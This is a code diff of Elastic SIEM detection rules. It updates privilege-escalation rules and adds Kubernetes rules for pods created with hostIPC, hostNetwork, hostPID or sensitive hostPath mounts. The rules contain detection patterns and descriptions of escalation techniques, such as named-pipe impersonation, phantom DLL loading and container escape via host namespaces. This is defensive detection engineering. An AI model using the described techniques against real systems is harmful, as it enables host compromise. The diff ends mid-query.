x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_sudo_activity.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_ml_linux_anomalous_sudo_activity.json diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_rare_user_runas_event.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_ml_windows_rare_user_runas_event.json similarity index 79% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_rare_user_runas_event.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_ml_windows_rare_user_runas_event.json index 6c9845699b723..ab8d1ede513d7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_rare_user_runas_event.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_ml_windows_rare_user_runas_event.json @@ -25,8 +25,20 @@ "Host", "Windows", "Threat Detection", - "ML" + "ML", + "Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [] + } ], "type": "machine_learning", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_named_pipe_impersonation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_named_pipe_impersonation.json index f903528dd5918..cc1b08700e342 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_named_pipe_impersonation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_named_pipe_impersonation.json @@ -12,13 +12,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Privilege Escalation via Named Pipe Impersonation", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and \n process.args : \"echo\" and process.args : \">\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \">\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n", "references": [ "https://www.ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "3ecbdc9e-e4f2-43fa-8cca-63802125e582", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -46,5 +64,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_new_or_modified_federation_domain.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_new_or_modified_federation_domain.json index c808635f20fb7..0e211de261a13 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_new_or_modified_federation_domain.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_new_or_modified_federation_domain.json @@ -10,8 +10,8 @@ "language": "kuery", "license": "Elastic License v2", "name": "New or Modified Federation Domain", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Set-AcceptedDomain\" or \n\"Set-MsolDomainFederationSettings\" or \"Add-FederatedDomain\" or \"New-AcceptedDomain\" or \"Remove-AcceptedDomain\" or \"Remove-FederatedDomain\") and \nevent.outcome:success\n", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Set-AcceptedDomain\" or\n\"Set-MsolDomainFederationSettings\" or \"Add-FederatedDomain\" or \"New-AcceptedDomain\" or \"Remove-AcceptedDomain\" or \"Remove-FederatedDomain\") and\nevent.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-accepteddomain?view=exchange-ps", "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-federateddomain?view=exchange-ps", @@ -20,8 +20,42 @@ "https://docs.microsoft.com/en-us/powershell/module/exchange/set-accepteddomain?view=exchange-ps", "https://docs.microsoft.com/en-us/powershell/module/msonline/set-msoldomainfederationsettings?view=azureadps-1.0" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "684554fc-0777-47ce-8c9b-3d01f198d7f8", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -57,5 +91,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_persistence_phantom_dll.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_persistence_phantom_dll.json index f53cbab5c3827..e5f2082a16ac1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_persistence_phantom_dll.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_persistence_phantom_dll.json @@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious DLL Loaded for Persistence or Privilege Escalation", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "library where dll.name :\n (\n \"wlbsctrl.dll\",\n \"wbemcomn.dll\",\n \"WptsExtensions.dll\",\n \"Tsmsisrv.dll\",\n \"TSVIPSrv.dll\",\n \"Msfte.dll\",\n \"wow64log.dll\",\n \"WindowsCoreDeviceInfo.dll\",\n \"Ualapi.dll\",\n \"wlanhlp.dll\",\n \"phoneinfo.dll\",\n \"EdgeGdi.dll\",\n \"cdpsgshims.dll\",\n \"windowsperformancerecordercontrol.dll\",\n \"diagtrack_win.dll\"\n ) and \nnot (dll.code_signature.subject_name : (\"Microsoft Windows\", \"Microsoft Corporation\") and dll.code_signature.status : \"trusted\")\n", + "note": "", + "query": "any where\n (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (\n /* compatible with Elastic Endpoint Library Events */\n (dll.name : (\"wlbsctrl.dll\", \"wbemcomn.dll\", \"WptsExtensions.dll\", \"Tsmsisrv.dll\", \"TSVIPSrv.dll\", \"Msfte.dll\",\n \"wow64log.dll\", \"WindowsCoreDeviceInfo.dll\", \"Ualapi.dll\", \"wlanhlp.dll\", \"phoneinfo.dll\", \"EdgeGdi.dll\",\n \"cdpsgshims.dll\", \"windowsperformancerecordercontrol.dll\", \"diagtrack_win.dll\")\n and (dll.code_signature.trusted == false or dll.code_signature.exists == false)) or\n\n /* compatible with Sysmon EventID 7 - Image Load */\n (file.name : (\"wlbsctrl.dll\", \"wbemcomn.dll\", \"WptsExtensions.dll\", \"Tsmsisrv.dll\", \"TSVIPSrv.dll\", \"Msfte.dll\",\n \"wow64log.dll\", \"WindowsCoreDeviceInfo.dll\", \"Ualapi.dll\", \"wlanhlp.dll\", \"phoneinfo.dll\", \"EdgeGdi.dll\",\n \"cdpsgshims.dll\", \"windowsperformancerecordercontrol.dll\", \"diagtrack_win.dll\")\n and not file.code_signature.status == \"Valid\")\n )\n", "references": [ "https://itm4n.github.io/windows-dll-hijacking-clarified/", "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html", @@ -22,8 +22,46 @@ "https://windows-internals.com/faxing-your-way-to-system/", "http://waleedassar.blogspot.com/2013/01/wow64logdll.html" ], + "required_fields": [ + { + "ecs": true, + "name": "dll.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "dll.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -81,5 +119,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pkexec_envar_hijack.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pkexec_envar_hijack.json index 298cb77347f04..56befaee38873 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pkexec_envar_hijack.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pkexec_envar_hijack.json @@ -15,6 +15,13 @@ "https://seclists.org/oss-sec/2022/q1/80", "https://haxx.in/files/blasty-vs-pkexec.c" ], + "required_fields": [ + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9", "severity": "high", @@ -66,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_hostipc.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_hostipc.json new file mode 100644 index 0000000000000..16e326094cb1e --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_hostipc.json @@ -0,0 +1,70 @@ +{ + "author": [ + "Elastic" + ], + "description": "This rule detects an attempt to create or modify a pod using the host IPC namespace. This gives access to data used by any pod that also use the host\ufffds IPC namespace. If any process on the host or any processes in a pod uses the host\ufffds inter-process communication mechanisms (shared memory, semaphore arrays, message queues, etc.), an attacker can read/write to those same mechanisms. They may look for files in /dev/shm or use ipcs to check for any IPC facilities being used.", + "false_positives": [ + "An administrator or developer may want to use a pod that runs as root and shares the host\ufffds IPC, Network, and PID namespaces for debugging purposes. If something is going wrong in the cluster and there is no easy way to SSH onto the host nodes directly, a privileged pod of this nature can be useful for viewing things like iptable rules and network namespaces from the host's perspective." + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Pod Created With HostIPC", + "note": "", + "query": "kubernetes.audit.objectRef.resource:\"pods\" and kubernetes.audit.verb:(\"create\" or \"update\" or \"patch\") and kubernetes.audit.requestObject.spec.hostIPC:true\n", + "references": [ + "https://research.nccgroup.com/2021/11/10/detection-engineering-for-kubernetes-clusters/#part3-kubernetes-detections", + "https://kubernetes.io/docs/concepts/security/pod-security-policy/#host-namespaces", + "https://bishopfox.com/blog/kubernetes-pod-privilege-escalation" + ], + "required_fields": [ + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.hostIPC", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "764c8437-a581-4537-8060-1fdb0e92c92d", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Kubernetes", + "Continuous Monitoring", + "Execution", + "Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_hostnetwork.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_hostnetwork.json new file mode 100644 index 0000000000000..513e3f3bf27ac --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_hostnetwork.json @@ -0,0 +1,70 @@ +{ + "author": [ + "Elastic" + ], + "description": "This rules detects an attempt to create or modify a pod attached to the host network. HostNetwork allows a pod to use the node network namespace. Doing so gives the pod access to any service running on localhost of the host. An attacker could use this access to snoop on network activity of other pods on the same node or bypass restrictive network policies applied to its given namespace.", + "false_positives": [ + "An administrator or developer may want to use a pod that runs as root and shares the host\ufffds IPC, Network, and PID namespaces for debugging purposes. If something is going wrong in the cluster and there is no easy way to SSH onto the host nodes directly, a privileged pod of this nature can be useful for viewing things like iptable rules and network namespaces from the host's perspective." + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Pod Created With HostNetwork", + "note": "", + "query": "kubernetes.audit.objectRef.resource:\"pods\" and kubernetes.audit.verb:(\"create\" or \"update\" or \"patch\") and kubernetes.audit.requestObject.spec.hostNetwork:true\n", + "references": [ + "https://research.nccgroup.com/2021/11/10/detection-engineering-for-kubernetes-clusters/#part3-kubernetes-detections", + "https://kubernetes.io/docs/concepts/security/pod-security-policy/#host-namespaces", + "https://bishopfox.com/blog/kubernetes-pod-privilege-escalation" + ], + "required_fields": [ + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.hostNetwork", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "12cbf709-69e8-4055-94f9-24314385c27e", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Kubernetes", + "Continuous Monitoring", + "Execution", + "Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_hostpid.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_hostpid.json new file mode 100644 index 0000000000000..670479cfbd907 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_hostpid.json @@ -0,0 +1,70 @@ +{ + "author": [ + "Elastic" + ], + "description": "This rule detects an attempt to create or modify a pod attached to the host PID namespace. HostPID allows a pod to access all the processes running on the host and could allow an attacker to take malicious action. When paired with ptrace this can be used to escalate privileges outside of the container. When paired with a privileged container, the pod can see all of the processes on the host. An attacker can enter the init system (PID 1) on the host. From there, they could execute a shell and continue to escalate privileges to root.", + "false_positives": [ + "An administrator or developer may want to use a pod that runs as root and shares the host\ufffds IPC, Network, and PID namespaces for debugging purposes. If something is going wrong in the cluster and there is no easy way to SSH onto the host nodes directly, a privileged pod of this nature can be useful for viewing things like iptable rules and network namespaces from the host's perspective." + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Pod Created With HostPID", + "note": "", + "query": "kubernetes.audit.objectRef.resource:\"pods\" and kubernetes.audit.verb:(\"create\" or \"update\" or \"patch\") and kubernetes.audit.requestObject.spec.hostPID:true\n", + "references": [ + "https://research.nccgroup.com/2021/11/10/detection-engineering-for-kubernetes-clusters/#part3-kubernetes-detections", + "https://kubernetes.io/docs/concepts/security/pod-security-policy/#host-namespaces", + "https://bishopfox.com/blog/kubernetes-pod-privilege-escalation" + ], + "required_fields": [ + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.hostPID", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "df7fda76-c92b-4943-bc68-04460a5ea5ba", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Kubernetes", + "Continuous Monitoring", + "Execution", + "Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_sensitive_hospath_volume.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_sensitive_hospath_volume.json new file mode 100644 index 0000000000000..a3b546c4de372 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_sensitive_hospath_volume.json @@ -0,0 +1,69 @@ +{ + "author": [ + "Elastic" + ], + "description": "This rule detects when a pod is created with a sensitive volume of type hostPath. A hostPath volume type mounts a sensitive file or folder from the node to the container. If the container gets compromised, the attacker can use this mount for gaining access to the node. There are many ways a container with unrestricted access to the host filesystem can escalate privileges, including reading data from other containers, and accessing tokens of more privileged pods.", + "false_positives": [ + "An administrator may need to attach a hostPath volume for a legitimate reason. This alert should be investigated for legitimacy by determining if the kuberenetes.audit.requestObject.spec.volumes.hostPath.path triggered is one needed by its target container/pod. For example, when the fleet managed elastic agent is deployed as a daemonset it creates several hostPath volume mounts, some of which are sensitive host directories like /proc, /etc/kubernetes, and /var/log." + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Pod created with a Sensitive hostPath Volume", + "note": "", + "query": "kubernetes.audit.objectRef.resource:\"pods\" \n and kubernetes.audit.verb:(\"create\" or \"update\" or \"patch\") \n and kubernetes.audit.requestObject.spec.volumes.hostPath.path:(\"/\" or \"/proc\" or \"/root\" or \"/var\" or \"/var/run/docker.sock\" or \"/var/run/crio/crio.sock\" or \"/var/run/cri-dockerd.sock\" or \"/var/lib/kubelet\" or \"/var/lib/kubelet/pki\" or \"/var/lib/docker/overlay2\" or \"/etc\" or \"/etc/kubernetes\" or \"/etc/kubernetes/manifests\" or \"/home/admin\")\n", + "references": [ + "https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216", + "https://kubernetes.io/docs/concepts/storage/volumes/#hostpath" + ], + "required_fields": [ + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.volumes.hostPath.path", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "2abda169-416b-4bb3-9a6b-f8d239fd78ba", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Kubernetes", + "Continuous Monitoring", + "Execution", + "Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_port_monitor_print_pocessor_abuse.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_port_monitor_print_pocessor_abuse.json index 0eb2a7e01a1d1..0da6a25a38957 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_port_monitor_print_pocessor_abuse.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_port_monitor_print_pocessor_abuse.json @@ -14,6 +14,28 @@ "references": [ "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "8f3e91c7-d791-4704-80a1-42c160d7aa27", "severity": "medium", @@ -72,5 +94,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_registry_copyfiles.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_registry_copyfiles.json index 3d84e33c83791..b3cf8097ef48f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_registry_copyfiles.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_registry_copyfiles.json @@ -16,6 +16,23 @@ "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Privilege%20Escalation/privesc_sysmon_cve_20201030_spooler.evtx", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1030" ], + "required_fields": [ + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "bd7eefee-f671-494e-98df-f01daf9e5f17", "severity": "high", @@ -44,5 +61,5 @@ } ], "type": "eql", - "version": 3 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_service_suspicious_file.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_service_suspicious_file.json index 77fe2279b0bc8..22e6924a5dcbe 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_service_suspicious_file.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_service_suspicious_file.json @@ -12,14 +12,37 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious PrintSpooler Service Executable File Creation", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "file where event.type != \"deletion\" and process.name : \"spoolsv.exe\" and\n file.extension : (\"exe\", \"dll\") and\n not file.path : (\"?:\\\\Windows\\\\System32\\\\spool\\\\*\", \"?:\\\\Windows\\\\Temp\\\\*\", \"?:\\\\Users\\\\*\")\n", "references": [ "https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/", "https://www.thezdi.com/blog/2020/7/8/cve-2020-1300-remote-code-execution-through-microsoft-windows-cab-files" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "5bb4a95d-5a08-48eb-80db-4c3a63ec78a8", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -47,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_suspicious_file_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_suspicious_file_deletion.json index d3847aa99e1ae..8ec2707ff5aa1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_suspicious_file_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_suspicious_file_deletion.json @@ -15,13 +15,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Print Spooler File Deletion", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "file where event.type : \"deletion\" and\n not process.name : (\"spoolsv.exe\", \"dllhost.exe\", \"explorer.exe\") and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\*.dll\"\n", "references": [ "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "c4818812-d44f-47be-aaef-4cfb2f9cc799", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_suspicious_spl_file.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_suspicious_spl_file.json index c696aaaf8399e..9431df30a66cb 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_suspicious_spl_file.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_suspicious_spl_file.json @@ -12,13 +12,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious PrintSpooler SPL File Created", - "note": "## Threat intel\n\nRefer to CVEs, CVE-2020-1048 and CVE-2020-1337 for further information on the vulnerability and exploit. Verify that the relevant system is patched.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Threat intel\n\nRefer to CVEs, CVE-2020-1048 and CVE-2020-1337 for further information on the vulnerability and exploit. Verify that the relevant system is patched.", "query": "file where event.type != \"deletion\" and\n file.extension : \"spl\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\PRINTERS\\\\*\" and\n not process.name : 